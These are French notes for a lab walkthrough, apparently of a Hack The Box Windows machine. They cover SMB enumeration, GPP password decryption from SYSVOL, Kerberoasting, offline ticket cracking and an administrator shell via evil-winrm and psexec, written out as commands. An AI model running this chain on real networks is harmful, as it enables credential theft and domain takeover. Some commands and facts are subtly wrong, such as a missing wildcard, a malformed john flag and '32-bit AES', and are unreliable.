Enumération Windows
---

- nmap -Pn -p-
	- -Pn Récupérer le minimum d'info
	- -p- Scan TOUT les ports
nmap -A windowsmachine -T5
- -T5 : plus rapide
- -A
	- -O
	- -sV
	- -sC
	- --traceroute

Chercher les protocoles SMB ? (445)

Quel ressources accessible sans mdp :
```
smbclient //10.10.1.1 -no-pass 
```
![Pasted image 20230328174958.png](img/Pasted%20image%2020230328174958.png)

Voir si accès au ressources : 
```
smbclient //10.10.1.1/Users -no-pass 
smbclient //10.10.1.1/Replication -no-pass 
```

![Pasted image 20230328175101.png](img/Pasted%20image%2020230328175101.png)

![Pasted image 20230328175115.png](img/Pasted%20image%2020230328175115.png)

Nous avons accès a SYSVOL.
- SYSVOL : dossier partagé pour la réplication, ainsi que les GPO.
	- GPO : config oblogatoire (eg : fond d'écran appliqué non changeable)
	- GPP : Config préféré (eg : fond d'écran appliqué mais changeable)

Fonction GPP qui permet de stocké dans des fichiers `Groups.xml` (le plus souvent) les Admin locaux
	Chiffrement AES 32 bits
	Clef pour chiffrer qui est la même que pour la déchiffrer

Commande utiles en CMD après être co avec smbclient : 

```vbnet
recurse on
prompt off
mget * 
```

Chercher tout les fichiers XML dans le dump : 
```
find . -name .xml
```

Puis afficher le fichier avec `cat`

Récupération du hash de MDP et autres infos utilisateurs :
![Pasted image 20230328175811.png](img/Pasted%20image%2020230328175811.png)

Puis `gpp-decrypt` suivi de la chaine du mot de passe :

```
gpp-decrypt "F7EZ36574z36f857q68G7687e687f68zae7f6EZ7F6AZ74F6z897fg6e8r7g68RE6G"
```

![Pasted image 20230328175914.png](img/Pasted%20image%2020230328175914.png)

Nous pouvons ensuite tester le mot de passe avec `psExec`
```
psexec.py svc-tgs@htb.htb
```
Il est possible de ne pas avoir assez de privilège à cette étape.

Nous pouvons tester avec `winrm` que nous avons vu dans le `nmap` précédent :

```
evil-winrm -i htb.htb -u svc_tgs
```
Toujours pas de privilège à ce moment.

Donc il faut tester plusieurs type d'attaque, comme le `kerberoasting`. 

### Kerberoasting ?

Nous essaierons dans cette attaque d'identifier des comptes utilisateurs qui ont l'attribut SPN (Service Principal Name) configuré dans leur compte.

![Pasted image 20230328180629.png](img/Pasted%20image%2020230328180629.png)
Changer l'attrbut et mettre "test".

SPN : Service Principal Name
- Nom principal d'un service
- Attribut qui permet a un application client d'identifier la machine qui héberge le service auquel il souhaite accéder.

```
GetUserSPNs.py -dc-ip 192.168.1.10 corp-world/administrator
```

Nous voyons que l'utilisateur que nous avons modifié apparait : 
![Pasted image 20230328180758.png](img/Pasted%20image%2020230328180758.png)

:::info Important 
> 
> - Pourquoi définir une valeur pour le SPN est dangereux ?
> 
> - Si l'environnement n'est pas protégé nous pouvons demander des ticket TGS au KDC pour ces utilisateurs, puis nous essaierons en local de cracker ce ticket TGS qui a été protégé avec le mot de passe de l'utilisateur (en bruteforce)
:::

### Test sur la box

Donc avec les informations précédentes, nous pouvons voir si un SPN est spécifié quelque part dans un environnement :
```
GetUserSPNs.py -dc-ip htb.htb htb.htb/svc_tgs
```
![Pasted image 20230328181154.png](img/Pasted%20image%2020230328181154.png)

Nous avons l'utilisateur Administrateur.
Nous pouvons ensuite requêter un jetons TGS avec le mot de passe trouvé précédemment :

```
GetUserSPNs.py htb.htb/svc_tgs'MotDePasseUser' -dc-ip htb.htb -request
```

Puis nous pouvons essayer de le cracker, après l'avoir dans un fichier `tgs_file`.
- johnTheRipper
- Hashcat
```
john --format-krb5tgs --wordlist=rockyou.txt tgs_file
john tgs_file --show 
```

Une fois le mot de passe trouvé, nous pouvons tenter de prendre le contrôle :
Avec `evil-winrm` :
```
evil-winrm -i htb.htb -u administrator 
	Password:
# Vous devrieze avoir le contrôle.
```

Avec `psexec` :

```
psexec.py administrator@192.168.1.10
```
Vous devriez accéder à la machine en tant que empty_security. 
